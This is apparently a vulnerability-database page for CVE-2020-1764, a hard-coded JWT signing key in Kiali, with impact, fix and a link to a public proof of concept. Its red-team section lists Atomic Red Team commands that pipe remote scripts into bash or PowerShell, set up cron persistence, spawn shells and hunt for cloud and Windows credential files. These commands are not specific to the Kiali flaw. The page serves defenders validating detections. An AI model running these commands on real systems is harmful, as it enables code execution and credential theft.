CVE-2020-1764
Overview
This vulnerability is a cryptographic key management flaw caused by the presence of a hard-coded cryptographic key within the default configuration file of Red Hat Kiali versions prior to 1.15.1. The affected component is the JWT authentication mechanism, which relies on this embedded key for token signing and verification. The use of a static, hard-coded key undermines the integrity of the authentication process by enabling token forgery.
Vulnerability Description
A hard-coded cryptographic key vulnerability in the default configuration file was found in Kiali, all versions prior to 1.15.1. A remote attacker could abuse this flaw by creating their own JWT signed tokens and bypass Kiali authentication mechanisms, possibly gaining privileges to view and alter the Istio configuration.
Impact
An unauthenticated remote attacker can generate valid JWT tokens using the hard-coded key, enabling them to bypass authentication and gain unauthorized access to Kiali. This access allows viewing and modification of Istio service mesh configurations, potentially leading to unauthorized privilege escalation and configuration tampering. The attack requires no user interaction or prior authentication (CVSS vector AV:N/AC:L/PR:N/UI:N), increasing the risk of widespread exploitation in exposed environments.
Solution
Red Hat recommends upgrading Kiali to version 1.15.1 or later, where the hard-coded key has been removed and replaced with a secure key management mechanism. Detailed patch instructions and advisories are available in the Kiali security bulletin (https://kiali.io/news/security-bulletins/kiali-security-001/) and Red Hat Bugzilla (https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1764). Users of Red Hat OpenShift Service Mesh 1.0 should also apply the corresponding security updates as per Red Hat advisories to mitigate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question arises from the presence of a hard-coded cryptographic key within the default configuration file of Kiali, a management console for Istio service mesh. This flaw allows an attacker to generate their own JSON Web Tokens (JWTs) that are signed using the compromised key. Since the authentication mechanism relies on the integrity of these tokens, an attacker can effectively bypass Kiali's authentication controls. This exploitation can lead to unauthorized access, enabling the attacker to view and modify Istio configurations, which could compromise the security and functionality of the entire service mesh.
The primary attack vector involves a remote adversary who can leverage the hard-coded key to create valid JWTs. By doing so, they can impersonate legitimate users or services within the Kiali environment. This capability allows them to gain elevated privileges, potentially leading to unauthorized changes in the Istio configuration. For instance, an attacker could manipulate traffic routing, alter service policies, or even disrupt service availability. The ease of exploitation, combined with the potential for significant impact, makes this vulnerability particularly concerning for organizations relying on Kiali for managing their microservices architecture.
In terms of real-world impact, the risks associated with this vulnerability are substantial. Organizations utilizing Kiali as part of their Istio deployment may face severe consequences if an attacker successfully exploits this flaw. Unauthorized access to Istio configurations can lead to data breaches, service disruptions, and a loss of customer trust. Furthermore, the ability to alter configurations could facilitate further attacks, such as injecting malicious code or redirecting traffic to unauthorized endpoints. The potential for financial loss, regulatory penalties, and reputational damage underscores the importance of addressing this vulnerability promptly.
To detect and mitigate this vulnerability, organizations should first ensure they are using an updated version of Kiali, specifically version 1.15.1 or later, where the hard-coded key issue has been resolved. Regularly reviewing and updating software components is a fundamental practice in maintaining a secure environment. Additionally, implementing robust monitoring and logging practices can help detect unusual activities that may indicate exploitation attempts. Organizations should also consider employing network segmentation and access controls to limit the potential impact of a successful attack. By minimizing the attack surface and ensuring that only authorized personnel have access to critical configurations, organizations can significantly reduce their risk exposure.
In conclusion, the hard-coded cryptographic key vulnerability in Kiali represents a serious threat to organizations utilizing this management console for Istio service mesh. The ability for an attacker to bypass authentication and manipulate configurations poses significant risks, including unauthorized access and potential service disruptions. By staying informed about the vulnerability, applying necessary updates, and implementing comprehensive security measures, organizations can protect their systems from exploitation and maintain the integrity of their microservices architecture.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Kiali | Kiali | All |
cpe:2.3:a:kiali:kiali:*:*:*:*:*:*:*:*
|
|
|
Redhat | Openshift Service Mesh | 1.0 |
cpe:2.3:a:redhat:openshift_service_mesh:1.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
jpts/cve-2020-1764-poc
Auth Bypass PoC for Kiali
|
jpts | 1 | 1 | 2020-07-06 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-1764 |
| kiali.io |
GitHub CVE
x_refsource_MISC
|
https://kiali.io/news/security-bulletins/kiali-security-001/ |
| bugzilla.redhat.com |
GitHub CVE
x_refsource_CONFIRM
|
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1764 |